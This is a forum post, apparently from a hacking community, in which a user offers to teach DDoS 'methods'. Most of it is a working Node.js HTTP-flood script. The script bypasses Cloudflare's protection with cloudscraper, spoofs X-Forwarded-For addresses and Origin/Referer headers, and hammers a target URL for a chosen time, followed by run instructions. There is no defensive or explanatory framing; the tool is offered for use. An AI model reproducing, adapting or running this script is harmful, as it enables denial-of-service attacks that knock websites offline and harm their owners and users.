• We just launched and are currently in beta. Join us as we build and grow the community.

Want to learn to DDOS?

K1Spamming

System Performance Tuner
K Rep
0
0
0
Rep
0
K Vouches
0
0
0
Vouches
0
Posts
125
Likes
68
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 200 XP
Do you want to learn some DDOS'n?? I'm no pro, but I have learnt a lot let me teach you some simple methods!!
Method #1: ( I said I'd teach you some methods not give you a f#cken lecture!! Take some time and research )
Very easy for this you'll need NodeJS installed - This is the HTTP-Bypass method
var cloudscraper = require('cloudscraper');
var request=require('request');
var randomstring = require("randomstring");
var args = process.argv.slice(2);
randomByte = function() {
return Math.round(Math.random()*256);
}
if (process.argv.length <= 2) {
console.log("node HTTP-BYPASS.js url time");
console.log("Edit by emp001");
process.exit(-1);
}
var url = process.argv[2];
var time = process.argv[3];
setInterval
var int = setInterval(() => {
var cookie = '';
var useragent = '';
cloudscraper.get(url, function(error, response, body) {
if (error) {
console.log('Error occurred');
} else {
var parsed = JSON.parse(JSON.stringify(response));
cookie = (parsed["request"]["headers"]["cookie"]);
useragent = (parsed["request"]["headers"]["User-Agent"]);
}
// console.log(cookie + '/' + useragent)
var rand = randomstring.generate({
length: 10,
charset: 'abcdefghijklmnopqstuvwxyz0123456789'
});
var ip = randomByte() +'.' +
randomByte() +'.' +
randomByte() +'.' +
randomByte();
const options = {
url: url,
headers: {
'User-Agent': useragent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Upgrade-Insecure-Requests': '1',
'cookie': cookie,
'Origin': 'http://' + rand + '.com',
'Referrer': 'http://google.com/' + rand,
'X-Forwarded-For': ip
}
};
function callback(error, response, body) {
}
request(options);
});
});
setTimeout(() => clearInterval(int), time * 1000);
process.on('uncaughtException', function(err) {
});
process.on('unhandledRejection', function(err) {
});
To run the DDOS - it's node (YOUR FILE NAME.js) URL TIME
 

452,496

333,651

333,659

Top